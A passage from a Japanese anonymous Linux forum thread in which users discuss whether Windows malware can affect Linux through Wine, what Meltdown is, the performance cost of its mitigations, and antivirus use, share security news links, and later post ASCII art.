ざっくりいうとそんなかんじ

276 :login:Penguin:2022/03/20(日) 00:23:55.05 ID:x64/Dmdi.net
Winのアプリの脆弱性をついた攻撃もLinuxに反映される?

277 :login:Penguin:2022/03/21(月) 20:34:59.19 ID:uF2U5kCh.net
例えばどんな脆弱性

278 :login:Penguin:2022/03/21(月) 23:58:27.98 ID:uhwbkFCX.net
>>272
この記事を今書いたらウイルス作成罪で逮捕されるよね

279 :login:Penguin:2022/03/24(木) 08:09:59.52 ID:ywqC7Lz4.net
たとえばC/C++で書かれたプログラムでメモリ破壊が起きる脆弱性とかがそのまま再現されるとか
Wineってサンドボックスじゃないんでしょ?

280 :login:Penguin:2022/03/24(木) 09:08:40.06 ID:ltaF4EoS.net
wine自体はサンドボックスではない。
一方でwineをサンドボックスの中で実行することは可能。
一般ユーザーの権限で実行すれば一般ユーザーの触れる部分しかさわれない。
コンテナで実行すればコンテナから見える部分しか関与できない。
セキュリティ設定下で実行すれば制限された権限しか使用出来そうない。
総じて使い方次第。

281 :login:Penguin:2022/03/31(木) 02:27:55.21 ID:6gTUptRM.net
メモリ破壊ってなんやねん。
wine自体の脆弱性でやられることはあっても、Windowsの脆弱性でやられることはないだろ。

282 :login:Penguin:2022/03/31(木) 03:38:11.81 ID:3Q2itE4U.net
例えば wine の中で microsoft office 動かしたとして、excel のマクロで書かれたウィルスとかは当然機能する。
アプリが乗っ取られれば meltdown ようなハードを対象とした攻撃ができる。
その他にアプリの穴をついてロボットを仕込むとかも可能。
一方で windows kernel や windows の起動システムやサービスに対する攻撃はできない。そもそんなものは存在しないので。

283 :login:Penguin:2022/03/31(木) 03:44:33.44 ID:6gTUptRM.net
>>282
meltdownで何ができんのよ?

284 :login:Penguin:2022/03/31(木) 08:38:02.95 ID:8KbeFvKq.net
「meltdown」では何も出来ないとしても、
「meltdownのようなハードを対象とした攻撃」は他にもある/今後発生するかもしれないでしょ

285 :login:Penguin:2022/03/31(木) 11:16:00.89 ID:3Q2itE4U.net
meltdown は権限のない場所のメモリ内容を盗み見る攻撃。ログインパスワードなどの重要情報を盗まれる可能性がある。
もちろん最新のOSを使っていれば対策されているのでできない(はず)。
一方で類似の攻撃手段は毎年のように開発されている。

286 :login:Penguin:2022/03/31(木) 13:02:29.46 ID:hrFKApv5.net
カーネルでメルトダウンの対策を無効にすると30%程度パフォーマンスが上がるような記事を昔見た

287 :login:Penguin:2022/03/31(木) 13:41:31.15 ID:3Q2itE4U.net
30%はかなり大げさ。ショート・パケットで大量IOしてるようなシステムでなければ、そこまで変わらない。
普通10%くらいじゃないかな。他の攻撃への対策にもなっているので off にするのは推奨されない。

288 :login:Penguin:2022/03/31(木) 21:33:05.86 ID:6gTUptRM.net
wineでexcelマクロ動かして脆弱性をついてさらにメルトダウンでって
ハードル高くてほぼ不可能じゃね。

289 :login:Penguin:2022/04/15(金) 17:17:49.06 ID:qZl81aXi.net
津波がここまで来るなんてありえないんじゃね?
とか思ってて東日本壊滅一歩手前だったことを
もう忘れたのだろうか

290 :login:Penguin:2022/04/16(土) 02:56:12 ID:/WJtMY4I.net
ま、それならドアに鍵1000個つけて暮らすといいよ。
安全だから。

291 :login:Penguin:2022/04/16(土) 05:31:13.38 ID:n2rPNAGD.net
ドアに鍵1000個つけると津波がこないんだ
へーすごーい それどこのカルト宗教?

292 :login:Penguin:2022/04/16(土) 06:21:24.35 ID:UdUglJWb.net
津波は例えで言ってるだけで誰もそこに言及してないんだが読解力ドベなのかな

293 :login:Penguin:2022/04/16(土) 06:47:13.85 ID:n2rPNAGD.net
「それなら」でつないでおいてその言い訳は恥ずかしくないの?

294 :login:Penguin:2022/04/16(土) 06:56:41.20 ID:9P5KPh3C.net
>>289をもう一度よく読んでみようか文盲

295 :login:Penguin:2022/04/16(土) 08:47:04.64 ID:L5OHmyPk.net
馬鹿同士仲良くしろって

ま、馬鹿だからするんだろうけど・・・

296 :login:Penguin:2022/04/16(土) 10:13:31.21 ID:60ZvNABA.net
無いことを証明するのは悪魔の証明で不可能だから、普通の人は普通に考えたら現実的に起こり得ない事は「無い」って表現するけどプログラマは「無いとは言えない」って表現する
みたいな冗談どっかで見たんだけどどこだったかな…

297 :login:Penguin:2022/04/17(日) 03:29:35.74 ID:d7BRhfM8.net
コスト計算ができないおバカ多いよね。

298 :login:Penguin:2022/04/17(日) 10:10:38.56 ID:VG7mWIvn.net
けんかをやめて
二人を止めて

299 :login:Penguin:2022/04/18(月) 17:23:14.19 ID:mAXwkcvQ.net
1月からsophosアップデート失敗してたわ

300 :login:Penguin:2022/05/02(月) 05:57:32.08 ID:v2q/MbXG.net
eset nod32は今年の第3四半期に終了か

301 :login:Penguin:2022/05/13(金) 18:58:08.52 ID:G/Ft5pt5.net
これLinuxに関係ある?
NVD - CVE-2022-26809
https://nvd.nist.gov/vuln/detail/CVE-2022-26809

302 :login:Penguin:2022/05/18(水) 16:49:18 ID:Qx87b8Vd.net
rootで使わなきゃ何とかなるっていうけど
しょっちゅうパスワード求められて麻痺しちゃってるから、いざウィルスか何かがパスワード求めてきてもうっかり入れちゃいそうな気がする

303 :login:Penguin:2022/05/20(金) 20:12:55.49 ID:c+i/ftSn.net
>>302
すげぇ分かる

304 :login:Penguin:2022/07/01(金) 12:14:40.96 ID:X1LGMm+v.net
ランレベル3からgui起動するとモッサリ動作になるのね
ランレベル5ならサクッと動く

305 :login:Penguin:2022/07/01(金) 20:19:27.91 ID:K96O39HQ.net
そもそもlinuxは安全、セキュリティーソフト入れる方が危険になるわ

306 :login:Penguin:2022/07/02(土) 21:28:58.41 ID:Z/sLdlGP.net
linuxにセキュリティーソフトを求める奴はlinux使わない方が身の為

307 :login:Penguin:2022/07/02(土) 21:59:28.84 ID:5BjrO4EH.net
よけいなサービス、アプリを稼働させると一般にセキュリティが落ちるよ
Google Chromeなんてバックグラウンドで勝手に実行するんだって

308 :login:Penguin:2022/07/03(日) 16:06:45.65 ID:djLtolpz.net
クラムウィン使っとる

309 :login:Penguin:2022/07/03(日) 16:07:38.41 ID:djLtolpz.net
ウィンじゃなかった

310 :login:Penguin:2022/07/05(火) 02:21:06.25 ID:6gRGIkVI.net
クラムボンはわらったよ

311 :login:Penguin:2022/07/11(月) 18:34:10.16 ID:kXR8bOak.net
「Linux」マルウェア「OrBit」発見--検出、削除が難しい新種 - ZDNet Japan
https://japan.zdnet.com/article/35190234/

312 :login:Penguin:2022/07/11(月) 18:52:11.08 ID:yZJnVccn.net
dropperをユーザーが自分でインストールしないといけないような類の奴を過剰に騒ぐのって逆効果だよな
そのせいでACEって何?RCEって何?ってレベルの馬鹿が勘違いして「Linuxでは自分で馬鹿なことしない限り安全なんですぅー!!!」みたいなイキり方しがちだし

313 :login:Penguin:2022/07/11(月) 23:53:00.18 ID:aOWuriZy.net
>>311
そのマルウェアを仕込まれる条件が一番の問題だろう
そいつが何ができるとか二の次

314 :login:Penguin:2022/07/12(火) 19:36:54.50 ID:g39esm2o.net
経路の例
「従業員情報が暗号化され、復号不能」 ランサムウェア「CryptXXX」攻撃受け カワムラグループ - ITmedia NEWS
https://www.itmedia.co.jp/news/spv/2207/12/news106.html

なんでもパッチ当たってないVPNがヤベーんだとよ

315 :login:Penguin:2022/07/12(火) 22:42:38 ID:0gQlELZD.net
IPAがゼロトラストセキュリティ入門資料を公開 基礎知識や心構え、検討の流れなど解説 - ITmedia NEWS
https://www.itmedia.co.jp/news/articles/2207/12/news129.html

関連情報
今更聞けない「ゼロトラストセキュリティ」の基本 具体的にはどう守る? - ITmedia NEWS
https://www.itmedia.co.jp/news/articles/2010/16/news172.html

316 :login:Penguin:2022/07/12(火) 22:47:43 ID:0gQlELZD.net
悪用続く「Log4Shell」 対応放置の企業はランサムウェア感染など二次被害 「パッチ適用を怠れば、コストは増大」: この頃、セキュリティ界隈で - ITmedia NEWS
https://www.itmedia.co.jp/news/spv/2207/12/news061.html

317 :login:Penguin:2022/09/12(月) 18:25:32.18 ID:QlS3Rpr8.net
Powerful New Linux Malware Shikitega Uses Unusual Multi-Stage Stealth
https://it.slashdot.org/story/22/09/11/0314234/powerful-new-linux-malware-shikitega-uses-unusual-multi-stage-stealth

318 :login:Penguin:2022/09/18(日) 15:34:09.33 ID:6jdCgZUV.net
不正アクセスに注意されたし

inetnum: 188.115.182.0 - 188.115.185.255
netname: TENET
descr: TeNeT Networking Centre
descr: Odessa Ukraine

319 :login:Penguin:2022/10/10(月) 16:37:16.45 ID:0A3GS1UX.net
JVNTA#96784241
VLAN対応ネットワーク機器において、L2保護機構がバイパスされる問題
https://jvn.jp/ta/JVNTA96784241/

320 :login:Penguin:2022/10/20(木) 13:37:32.96 ID:Zy5/zOs3.net
メモリー上に直接マルウェアを展開する攻撃を発見--家庭用PCが標的
https://japan.zdnet.com/article/35194695/

321 :login:Penguin:2022/12/08(木) 22:21:27.92 ID:l3DluBSK.net
Parrot Security
https://www.parrotsec.org/download/
https://bunny.deb.parrot.sh//parrot/iso/5.1.2/Parrot-home-5.1.2_amd64.iso
5fe197d3381a4cc816eb523c32532076 Parrot-home-5.1.2_amd64.iso
b04b4ea5bcbff79d5a098cd6524296a37d2f7ee7 Parrot-home-5.1.2_amd64.iso
b907e0dc4ba156566471a8a271ddd575a7af2c5af4cc8bc18a949cc3 Parrot-home-5.1.2_amd64.iso
8ed307e7a135ee3bca048abf609ed8af22ecae5fb0e1c72472d39929c7cf827a Parrot-home-5.1.2_amd64.iso
34e4171853fe502b3130d0c82da5af9fd15b79b910fe9a03c83aa522eea1042d40e1ca10e294259584ab5467b8be5e33 Parrot-home-5.1.2_amd64.iso
98001b8c49f2eeb44cb354b630a43681c2c1bb6e6ad15e3c0d70fdcf8e5f85d918cd9b8afa91f546b7f93d158e98858722db17e2b7e209321dc93d2980e05cb8 Parrot-home-5.1.2_amd64.iso

322 :login:Penguin:2023/02/19(日) 19:46:37.61 ID:j798oBCu.net
   /^^ヽ
  (。・-・) ヤッホ
   ゚し-J
  (。・-・).。oO( お〜い )
   ゚し-J

323 :login:Penguin:2023/04/17(月) 18:57:08.99 ID:KAmRT7oi.net
      (V)∧_∧(V)
      ヽ(・ω・)ノ  フォッフォッフォッ
        /  /
       ノ ̄ゝ

324 :login:Penguin:2023/04/17(月) 23:16:26.34 ID:DooHb9mZ.net
昔ESET入れたら半端無く重くなって驚いた思い出。

325 :login:Penguin:2023/05/10(水) 02:01:28.21 ID:q4Z5Qt7r.net
            i"\ ))
            | 8  )
           ∧,,,∧∩-''"
      _ ..(´・ω・`)彡 ズロース ズロース ! !
   〃(\ ∞ ,⊂彡
     `ヽ)_ノ|   | 
          し⌒J   

326 :login:Penguin:2023/07/21(金) 11:38:21.39 ID:dnV52bFu.net
   ___
   (\ ∞ ノ  
   ヽ)_ノ  暑くても履いてくださいね〜

327 :login:Penguin:2023/09/30(土) 22:48:18.82 ID:0rNJpOGK.net
      (V)∧_∧(V)
      ヽ(・ω・)ノ  ズロース フォッ !
        /  /
       ノ ̄ゝ

328 :login:Penguin:2024/01/09(火) 00:57:06.45 ID:Drc3Iy8x.net
   /^^ヽ
  (。・-・) ヤッホ
   ゚し-J
  (。・-・).。oO( お〜い )
   ゚し-J

329 :login:Penguin:2024/02/14(水) 17:19:04.54 ID:WjA0v6iO.net
       ___
       (\ ∞ ノ  
       ヽ)_ノ 

330 :login:Penguin:2024/03/14(木) 01:02:21.72 ID:CjKcJTG+.net
  ノ~ヽ
 (_∞_)
 ( ´・ω・) ∫ 
 //\ ̄ ̄旦\
// ※\___\
\\  ※  ※ ※ ヽ
  \ヽ-―――――ヽ

107 KB
新着レスの表示
掲示板に戻る 全部 前100 次100 最新50
名前: E-mail (省略可) :

read.cgi ver 2014.07.20.01.SC 2014/07/20 D ★